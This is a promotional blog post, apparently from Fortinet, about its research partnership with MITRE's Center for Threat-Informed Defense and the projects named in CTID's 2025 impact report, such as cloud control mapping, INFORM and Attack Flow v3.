The MITRE Center for Threat-Informed Defense (CTID) has released its latest impact report, arriving at a pivotal moment for cybersecurity. Defenders are no longer facing isolated attacks, tools, or control gaps, and are instead facing adversaries that are adaptive and operate across multiple domains, such as cloud environments, identity systems, endpoints, applications, infrastructure, and increasingly AI-driven workflows.

Security teams require actionable methods to connect adversary behavior with detection engineering, control validation, vulnerability prioritization, cloud security, and overall security program development.

Fortinet’s partnership with MITRE CTID supports that goal. CTID is a nonprofit R&D consortium operated by MITRE, whose research is made publicly available for the benefit of defenders worldwide. Its 2025 impact report reflects the scale of that mission, from CTID’s launch in 2019 through its 2025 projects, over 1,100 researchers from 38 countries across five continents, and more than 50 participating organizations have contributed to 52 R&D projects.

Fortinet is proud to be part of that work as a CTID Research Partner. Through this collaboration, Fortinet contributes threat intelligence, security research, operational expertise, and a defender-focused perspective to projects that enhance practical, scalable, and accessible threat-informed defense.

The significance of CTID extends beyond generating research. Its true value is in uniting security practitioners, researchers, vendors, financial institutions, healthcare organizations, technology firms, and nonprofits to collaboratively address challenges that no single entity can resolve as efficiently alone.

Threat-informed defense relies on a shared understanding. MITRE ATT&CK offers defenders a common language for describing adversary behavior. Building on that, CTID provides practical resources that assist organizations in applying this language to real security decisions: identifying which detections to enhance, controls to validate, vulnerabilities to prioritize, and program gaps to address first.

For Fortinet, this closely aligns with our cybersecurity philosophy. Defenders require unified visibility, threat intelligence, automation, and security controls that work together. They also need frameworks that connect these capabilities to the adversary behaviors targeted by these controls.

Turning Cloud Security into a Threat-Informed Discipline

Cloud environments are often secured using checklists, best practices, and control frameworks. While such tools are useful, they can also leave teams asking a basic question: How do these controls map to real adversary behavior?

The Threat-Informed Defense for Cloud Security project helps answer that question by mapping the Cloud Security Alliance’s (CSA) Cloud Controls Matrix v4.1 to MITRE ATT&CK. Fortinet's contribution to this project sharpens how organizations can make cloud security decisions based on real-world attack data rather than assumptions. 

For defenders, establishing that connection is crucial. It enables cloud security teams to determine which controls address specific behaviors, identify areas with solid coverage, and spot where further investment is necessary. This approach also moves cloud security beyond merely meeting compliance requirements, emphasizing a more operational strategy aimed at minimizing risk and confirming the effectiveness of defenses.

Measuring Threat-Informed Defense at the Program Level

Threat-informed defense is both a technical discipline and a program-level approach. Organizations must assess the maturity of their security initiatives across cyberthreat intelligence, defensive strategies, and testing and evaluation.

MITRE INFORM gives organizations a structured framework to evaluate and improve their threat-informed posture. As a project research partner, Fortinet helps security leaders determine where to direct investments and how to advance program maturity. 

This matters most for leaders who must connect technical security efforts to business decisions. INFORM moves teams from claiming threat-informed defense to measuring it, with clear visibility into strengths, gaps, and where to improve next.

Reducing Ambiguity in Modern Detection

Modern attackers are increasingly using tactics that are hard to differentiate from normal activity. Techniques like living-off-the-land, administrative tools, scripted actions, and movement based on identity can all generate signals that seem harmless on their own. This ambiguity adds noise for defenders and gives adversaries more opportunities.

The Ambiguous Techniques project addresses that problem by applying contextual analysis to ATT&CK techniques to help determine malicious intent behind seemingly benign behavior. Fortinet is a project research partner, and as I noted in the CTID impact report: “Modern adversaries deliberately operate in the gray space between benign behavior and malicious action, making advanced analysis of ATT&CK patterns an operational necessity, not a research luxury.”

This is where threat-informed defense proves particularly effective. The aim is not merely to detect more but to improve detection quality. Context helps turn a suspicious event into a defensible conclusion, enabling analysts to lower false positives and concentrate on the most important activities.

Understanding Attacks as Sequences, Not Isolated Events

Although individual ATT&CK techniques are helpful, attackers seldom operate alone. Instead, they follow a series of actions: gaining access, escalating privileges, avoiding detection, moving laterally, and working toward their goals over time.

Attack Flow v3 enables defenders to document, visualize, and communicate chains of adversary behavior. As a project research partner, Fortinet contributed to a release that sharpens how teams build and present flows, with new visualization capabilities that surface patterns more quickly. 

For security teams, this puts threat-informed defense into practice across stakeholder levels. Analysts use flows to understand adversary behavior in depth. Detection engineers identify coverage gaps. Leaders see directly how defensive measures align with real attack paths.

Supporting the Future of Threat-Informed Defense

“Fortinet brings both depth and genuine commitment to the work we do together at the center. Their involvement across multiple CTID research initiatives reflects how a global security leader operationalizes threat-informed defense rather than just endorsing it. That kind of hands-on contribution is what moves the practice forward for defenders everywhere,” says Leslie Z. Anderson, chief cyber strategist and head of threat-informed defense programs, MITRE.

The CTID impact report also outlines the future of threat-informed defense. Its 2026 R&D roadmap focuses on helping defenders operationalize adversary behavior at scale, covering areas such as detection strength, insider threat mitigation, security capability mapping, program maturity, fraud prevention, attack flow, and AI security. 

This direction aligns with the challenges security teams face. Today’s defenders need research that is practical enough to use, adaptable across different settings, and accessible to the larger community. Additionally, they need methods to combine intelligence, controls, detection, testing, and strategic decisions into a unified security strategy.

Fortinet’s collaboration with CTID aligns with this goal. It also enhances our broader effort to improve security outcomes through an integrated technology strategy, AI-enhanced operations, FortiGuard Labs threat intelligence, and advanced security features that span networks, endpoints, cloud environments, applications, and user protection.

Changing the Game on the Adversary

Fortinet’s collaboration with MITRE CTID reflects a shared belief that effective cyber defense must be grounded in how adversaries actually operate. That is the real value of the relationship. It is not collaboration for its own sake.

As attackers become more adaptive, automated, and distributed, defenders need practical frameworks that translate threat intelligence into action. They need ways to evaluate controls against real-world techniques, strengthen cloud defenses, improve detection quality, and mature their security programs over time.

MITRE CTID’s work helps provide that foundation. Fortinet’s participation brings operational security expertise, threat intelligence, and a defender-focused perspective to research that benefits the broader community.

The collaboration between the organizations is designed to help defenders move faster, make better decisions, and change the game against our common adversary.

Learn more about Fortinet’s commitment to its collaboration with esteemed organizations from both the public and private sectors, including MITRE CTID.